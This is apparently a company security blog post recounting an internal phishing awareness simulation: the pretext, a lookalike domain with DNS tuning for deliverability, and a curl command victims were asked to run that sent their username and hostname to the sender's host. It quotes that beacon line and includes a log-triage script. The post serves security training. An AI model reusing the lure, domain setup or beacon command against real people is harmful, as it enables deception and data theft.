A Successful Phishing Attack Simulation
To raise awareness about scammers and prevent employees from leaking confidential data, Whatfix Infosec decided to conduct a phishing awareness training program.
Phishing is a type of cyberattack where an attacker poses as a trustworthy entity, such as a bank, employer, or email provider, and tricks the victim into giving sensitive information, such as passwords, credit card numbers, or social security numbers. The attacker usually does this through email.
The impact of a successful phishing attack can be severe, as the attacker can gain access to sensitive data, such as financial information or personal identification.
This article is divided into three sections: the first discusses social engineering (the psychological aspects), the second discusses the technical aspects, and the third discusses the outcome of the attack.
1. Social Engineering (Psychological Aspects):
The first part was to find a way to psychologically trick users into paying attention to the phishing email and make them believe that it was genuine. This is called social engineering.
We had many ideas, but we had to ensure that we used only publicly available information and that the idea would catch the user’s attention and win their confidence.
Whether it is 5G or 4G, people always want the fastest internet connection, so we decided to leverage this psychological fact.
We built the entire story around this fact and asked InfoSec team members to evaluate how effective it would be at phishing individuals. After receiving their feedback, we incorporated the necessary changes into the email content that we planned to use against our targets.
The content appeared to be legitimate and trustworthy, giving it the potential to effectively deceive unsuspecting individuals.
2. Technical aspects:
To make our phishing simulation more realistic, we decided to register a domain name (example.com) similar to the organization’s domain. Additionally, to send a large volume of emails, we chose to use a reputed email-sending solution.
We also made a few modifications to the DNS records of example.com. These modifications were made to enhance the domain’s reputation and establish proper DMARC functionality. These DNS records play a crucial role in verifying the authenticity and integrity of the domain, ensuring that it is recognized as a reputable source of communication. To learn more about the DNS records responsible for mail delivery, please read this article.
To proceed, we needed to identify the victims who had fallen for the phishing attempt. To achieve this, we asked users to execute a specific command in the terminal.
We implemented a straightforward curl command to download a script from the server. The script contained another curl command that sent a GET request including the username and hostname of the system to our server.
Thus, we decided to identify each user individually through this method, although, in hindsight, it was not a good idea.
Our plan was to extract the usernames and corresponding hostnames from the logs by analyzing the HTTP GET requests. Once we had confirmed that everything was functioning properly, we were prepared to go live.
At approximately 6 PM IST, we began sending emails to everyone and monitored the incoming requests through the logs. Initially, everything appeared to be working correctly, and legitimate requests were being received. However, as time went on, we began to notice an influx of false requests containing fabricated usernames and information.
So one tech-savvy dude read the script’s code and began sending fake requests:
curl -X GET http://example.com/Lap-`hostname`-Name-`whoami`
He substituted a list of usernames for `whoami` and a list of fake hostnames for `hostname`, and ran the whole request inside a while loop.
As a result, we were inundated with an excessive number of requests. Fortunately, we had a verified list of users and their corresponding hostnames, allowing us to filter out the authentic data.
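The log triage described above, as an added example that is not part of the original post: it parses constructed web-server access-log lines whose path follows the curl command quoted in the article, filters them against a constructed verified list of (username, hostname) pairs, and flags source IPs that send a burst of requests. A valid pair replayed from a flooding source is reported separately, since the verified list alone cannot tell it apart from a real victim.

```python
import re
from collections import Counter

# Constructed sample access-log lines (not from the original post). The request
# path follows the tracking command quoted in the article: /Lap-<hostname>-Name-<username>
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2023:18:02:11 +0530] "GET /Lap-MBP-alice-Name-alice HTTP/1.1" 200 12
10.0.0.9 - - [12/Jun/2023:18:04:37 +0530] "GET /Lap-DESKTOP-BOB-Name-bob HTTP/1.1" 200 12
10.0.0.42 - - [12/Jun/2023:18:30:01 +0530] "GET /Lap-fakehost1-Name-ceo HTTP/1.1" 200 12
10.0.0.42 - - [12/Jun/2023:18:30:01 +0530] "GET /Lap-fakehost2-Name-root HTTP/1.1" 200 12
10.0.0.42 - - [12/Jun/2023:18:30:02 +0530] "GET /Lap-MBP-alice-Name-alice HTTP/1.1" 200 12
10.0.0.7 - - [12/Jun/2023:18:41:55 +0530] "GET /index.html HTTP/1.1" 404 0
"""

# Constructed "verified list" of (username, hostname) pairs, as an asset inventory would hold.
VERIFIED = {("alice", "MBP-alice"), ("bob", "DESKTOP-BOB"), ("carol", "DESKTOP-CAROL")}

# Hostnames may contain "-", so the host group is greedy and anchored on the fixed "-Name-" marker.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "GET /Lap-(?P<host>.+)-Name-(?P<user>[^/ ]+) HTTP/'
)


def parse_beacons(log_text):
    """Return (ip, user, host) for every request that matches the tracking path."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            hits.append((m["ip"], m["user"], m["host"]))
    return hits


def triage(log_text, verified, flood_threshold=3):
    """Split beacons into confirmed victims, fabricated entries, and valid pairs from noisy sources."""
    hits = parse_beacons(log_text)
    per_ip = Counter(ip for ip, _, _ in hits)
    noisy_ips = {ip for ip, n in per_ip.items() if n >= flood_threshold}
    confirmed, suspicious, fabricated = set(), set(), set()
    for ip, user, host in hits:
        if (user, host) not in verified:
            fabricated.add((ip, user, host))      # pair not in inventory: fake
        elif ip in noisy_ips:
            suspicious.add((ip, user, host))      # real pair, but sent by a flooding source
        else:
            confirmed.add((user, host))
    return {"confirmed": sorted(confirmed), "suspicious": sorted(suspicious),
            "fabricated": sorted(fabricated), "noisy_ips": sorted(noisy_ips)}
```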
3. Outcome:
Upon the conclusion of our phishing attack simulation, we were able to infiltrate and obtain confidential information from individuals. Additionally, by involving multiple people in the development of our social engineering tactics and incorporating their feedback, we were able to create a narrative that appeared convincing and legitimate to the targets. However, our success was not without obstacles, as we encountered a number of fake requests generated by one member. Nonetheless, we were able to use our verified list of users and hostnames to filter out the authentic data and achieve our desired outcome.
In our previous phishing attack, 10% of employees fell for it. This time, the percentage was 6%. This decrease shows that our awareness efforts were successful.
Moral of the story: The repercussions of the attack that was conducted in this case were so severe that they could be compared to the effects of gaining a reverse shell. Had the payload been a reverse shell instead of a simple curl command, the consequences would have been disastrous. Therefore, it is important to realize the gravity of such attacks and take necessary measures to prevent them.
Safeguarding against phishing: Ways to safeguard against phishing attacks include:
- Verify the authenticity of the domain from which the emails originate. It is essential to cross-check whether the emails are coming from the right domain. In this case, the attackers sent emails from the domain “example.com”. Despite this, users were not able to identify that the emails were coming from an external source. Gmail even flagged those emails as external, but users still failed to recognize the warning signs.
- Don’t click on links in emails from people you don’t know. If you’re not sure if an email is legitimate, hover your mouse over the link to see the actual URL. If the URL doesn’t look like it belongs to the company that supposedly sent the email, don’t click on it.
- Don’t give out personal information (PII) in emails. If someone asks for this information in an email, it’s probably a phishing attack.
- Be wary of emails that seem urgent. Phishing attacks often try to create a sense of urgency by telling you that your account will be closed or that you’ve won a prize. If an email seems too good to be true, it probably is.
- Use a spam filter. A spam filter can help to reduce the number of phishing emails that you receive.
Hence, it is imperative to be vigilant and cautious while dealing with emails, especially those that ask for sensitive information or convey a sense of urgency. This will ensure that one does not fall prey to phishing attacks, which can lead to dire consequences.
To ensure the safety of the organization, it is highly recommended that users report any suspicious emails they receive to the InfoSec team. It is essential to take proactive steps to prevent potential threats and maintain the integrity of the system.
References:
https://en.wikipedia.org/wiki/Social_engineering_(security)
https://www.cloudflare.com/en-in/learning/dns/dns-records/dns-txt-record/